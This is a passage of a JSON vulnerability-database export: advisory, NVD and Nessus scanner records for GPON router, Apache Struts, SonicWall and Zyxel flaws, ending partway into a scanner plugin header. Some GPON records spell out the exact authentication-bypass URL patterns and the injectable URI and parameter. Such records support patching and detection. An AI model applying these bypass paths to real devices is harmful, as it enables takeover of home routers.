Authentication Bypass (CVE-2018-10561)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10561"], "modified": "2019-03-19T00:00:00", "id": "CPAI-2018-0459", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:29:20", "description": "A remote command execution vulnerability exists in Dasan GPON routers. A remote attacker could exploit this vulnerability by sending a malicious request to the victim. Successful exploitation of this vulnerability can result in the execution of arbitrary code in the context of the target user.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-13T00:00:00", "type": "checkpoint_advisories", "title": "Dasan GPON Router Remote Command Injection (CVE-2018-10562)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10562"], "modified": "2018-05-13T00:00:00", "id": "CPAI-2018-0458", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:27:15", "description": "A remote code execution vulnerability exists in Apache Struts. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-23T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts Remote Code Execution (CVE-2018-11776)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-12T00:00:00", "id": "CPAI-2018-0849", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-04T10:32:49", "description": "A remote code execution vulnerability exists in Apache Struts2. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-07T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts2 Content-Type Remote Code Execution (CVE-2017-5638)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2022-09-28T00:00:00", "id": "CPAI-2017-0197", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:33:37", "description": "A remote code execution vulnerability exists in the Apache Struts2 using Jakarta multipart parser. An attacker could exploit this vulnerability by sending an invalid content-disposition as part of a file upload request. Successful exploitation could result in execution of arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-08-09T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts 2 Content-Disposition Remote Code Execution (CVE-2017-5638)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-08-29T00:00:00", "id": "CPAI-2017-0676", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-06-23T14:09:39", "description": "An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-04T03:29:00", "type": "cve", "title": "CVE-2018-10562", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10562"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:dasannetworks:gpon_router_firmware:-"], "id": "CVE-2018-10562", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10562", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:dasannetworks:gpon_router_firmware:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-23T15:28:14", "description": "A vulnerability in lack of validation of user-supplied parameters pass to XML-RPC calls on SonicWall Global Management System (GMS) virtual appliance's, allow remote user to execute arbitrary code. This vulnerability affected GMS version 8.1 and earlier.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-03T20:29:00", "type": "cve", "title": "CVE-2018-9866", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-9866"], "modified": "2019-10-09T23:43:00", "cpe": ["cpe:/a:sonicwall:global_management_system:8.1"], "id": "CVE-2018-9866", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-9866", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:sonicwall:global_management_system:8.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T15:25:55", "description": "A command injection vulnerability was discovered on the Zyxel EMG2926 home router with firmware V1.00(AAQT.4)b8. The vulnerability is located in the diagnostic tools, specifically the nslookup function. A malicious user may exploit numerous vectors to execute arbitrary commands on the router, such as the ping_ip parameter to the expert/maintenance/diagnostic/nslookup URI.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-06T17:59:00", "type": "cve", "title": "CVE-2017-6884", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6884"], "modified": "2017-04-12T18:29:00", "cpe": ["cpe:/o:zyxel:emg2926_firmware:v1.00\$aaqt.4\$b8"], "id": "CVE-2017-6884", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-6884", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:zyxel:emg2926_firmware:v1.00\$aaqt.4\$b8:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-23T14:09:39", "description": "An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending \"?images\" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-04T03:29:00", "type": "cve", "title": "CVE-2018-10561", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10561"], "modified": "2019-03-04T18:39:00", "cpe": ["cpe:/o:dasannetworks:gpon_router_firmware:-"], "id": "CVE-2018-10561", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10561", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:dasannetworks:gpon_router_firmware:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-19T14:51:48", "description": "Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no or wildcard namespace.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-22T13:29:00", "type": "cve", "title": "CVE-2018-11776", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2023-06-12T07:15:00", "cpe": ["cpe:/a:apache:struts:2.5.16", "cpe:/a:apache:struts:2.3.34"], "id": "CVE-2018-11776", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11776", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:struts:2.3.34:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.16:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-23T15:05:56", "description": "The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-11T02:59:00", "type": "cve", "title": "CVE-2017-5638", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2021-02-24T12:15:00", "cpe": ["cpe:/a:apache:struts:2.5.9", "cpe:/a:apache:struts:2.3.14.3", "cpe:/a:apache:struts:2.5.5", "cpe:/a:apache:struts:2.5.6", "cpe:/a:apache:struts:2.3.15.3", "cpe:/a:apache:struts:2.3.10", "cpe:/a:apache:struts:2.3.16.2", "cpe:/a:apache:struts:2.5.8", "cpe:/a:apache:struts:2.3.27", "cpe:/a:apache:struts:2.3.16", "cpe:/a:apache:struts:2.3.9", "cpe:/a:apache:struts:2.3.31", "cpe:/a:apache:struts:2.3.14.1", "cpe:/a:apache:struts:2.3.25", "cpe:/a:apache:struts:2.3.20", "cpe:/a:apache:struts:2.3.28", "cpe:/a:apache:struts:2.5.2", "cpe:/a:apache:struts:2.5.10", "cpe:/a:apache:struts:2.5.7", "cpe:/a:apache:struts:2.3.19", "cpe:/a:apache:struts:2.5.1", "cpe:/a:apache:struts:2.3.26", "cpe:/a:apache:struts:2.3.16.3", "cpe:/a:apache:struts:2.3.24.3", "cpe:/a:apache:struts:2.3.28.1", "cpe:/a:apache:struts:2.3.21", "cpe:/a:apache:struts:2.3.22", "cpe:/a:apache:struts:2.3.24.2", "cpe:/a:apache:struts:2.3.12", "cpe:/a:apache:struts:2.3.20.3", "cpe:/a:apache:struts:2.3.24", "cpe:/a:apache:struts:2.5.3", "cpe:/a:apache:struts:2.3.20.2", "cpe:/a:apache:struts:2.3.13", "cpe:/a:apache:struts:2.3.23", "cpe:/a:apache:struts:2.3.14.2", "cpe:/a:apache:struts:2.3.16.1", "cpe:/a:apache:struts:2.3.11", "cpe:/a:apache:struts:2.3.7", "cpe:/a:apache:struts:2.3.14", "cpe:/a:apache:struts:2.3.15", "cpe:/a:apache:struts:2.3.30", "cpe:/a:apache:struts:2.3.15.2", "cpe:/a:apache:struts:2.3.29", "cpe:/a:apache:struts:2.5.4", "cpe:/a:apache:struts:2.5", "cpe:/a:apache:struts:2.3.20.1", "cpe:/a:apache:struts:2.3.24.1", "cpe:/a:apache:struts:2.3.15.1", "cpe:/a:apache:struts:2.3.17", "cpe:/a:apache:struts:2.3.8", "cpe:/a:apache:struts:2.3.5", "cpe:/a:apache:struts:2.3.6"], "id": "CVE-2017-5638", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5638", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:struts:2.3.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.24.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.27:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.30:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.20.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.31:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.20.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.24.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.29:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.24:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.26:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.28.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.24.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.20.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.25:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2023-09-26T15:12:02", "description": "An issue was discovered in GPON ONT Home Gateway Router web administration interface. Remote Command Execution could be triggered by sending a HTTP POST request to 'GponForm/diag_Form' URI with malicious shell script added to dest_host parameter. Because the router saves ping and traceroute command execution results in /tmp and transmits them to the user when the user revisits /diag.html, it's possible to execute arbitrary commands and retrieve their output.\nThis allows an attacker to fully control the target device.", "cvss3": {}, "published": "2018-12-19T00:00:00", "type": "nessus", "title": "GPON ONT Home Gateway Router is vulnerable to authenticated remote command execution (CVE-2018-10562)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10562"], "modified": "2023-09-25T00:00:00", "cpe": ["cpe:/a:dasannetworks:gpon_router"], "id": "GPON_CVE-2018-10562.NBIN", "href": "https://www.tenable.com/plugins/nessus/119777", "sourceData": "Binary data gpon_cve-2018-10562.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-27T15:33:32", "description": "An issue was discovered in GPON ONT Home Gateway Router web administration interface. It is possible to bypass authentication of web interface by using the following approach:\n- http(s)://<Router IP>/<some file>?images/\n- http(s)://<Router IP>/<some file>?style/\n- http(s)://<Router IP>/<some file>?script/\n- http(s)://<Router IP>/images/../<some file>\n- http(s)://<Router IP>/style/../<some file>\n- http(s)://<Router IP>/script/../<some file> For example, '/menu.html?images/' or '/GponForm/diag_FORM?images/' URI.\nThis allows an attacker to fully control the target device.", "cvss3": {}, "published": "2018-12-19T00:00:00", "type": "nessus", "title": "GPON ONT Home Gateway Router is vulnerable to authentication bypass (CVE-2018-10561)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10561"], "modified": "2023-09-25T00:00:00", "cpe": ["cpe:/a:dasannetworks:gpon_router"], "id": "GPON_CVE-2018-10561.NBIN", "href": "https://www.tenable.com/plugins/nessus/119776", "sourceData": "Binary data gpon_cve-2018-10561.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-18T15:45:00", "description": "The version of Apache Struts running on the remote host is affected by a remote code execution vulnerability in the handling of results with no namespace set. An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP request, to potentially execute arbitrary code, subject to the privileges of the web server user.", "cvss3": {}, "published": "2018-08-23T00:00:00", "type": "nessus", "title": "Apache Struts CVE-2018-11776 Results With No Namespace Remote Code Execution (S2-057) (remote)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2023-07-17T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_17_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/112064", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(112064);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/07/17\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts CVE-2018-11776 Results With No Namespace Remote Code Execution (S2-057) (remote)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is affected by\na remote code execution vulnerability in the handling of results with\nno namespace set. An unauthenticated, remote attacker can exploit this,\nvia a specially crafted HTTP request, to potentially execute arbitrary\ncode, subject to the privileges of the web server user.\");\n # https://www.tenable.com/blog/new-apache-struts-vulnerability-could-allow-for-remote-code-execution\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a21304a0\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2018/Aug/46\");\n script_set_attribute(attribute:\"see_also\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.35 / 2.5.17 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n 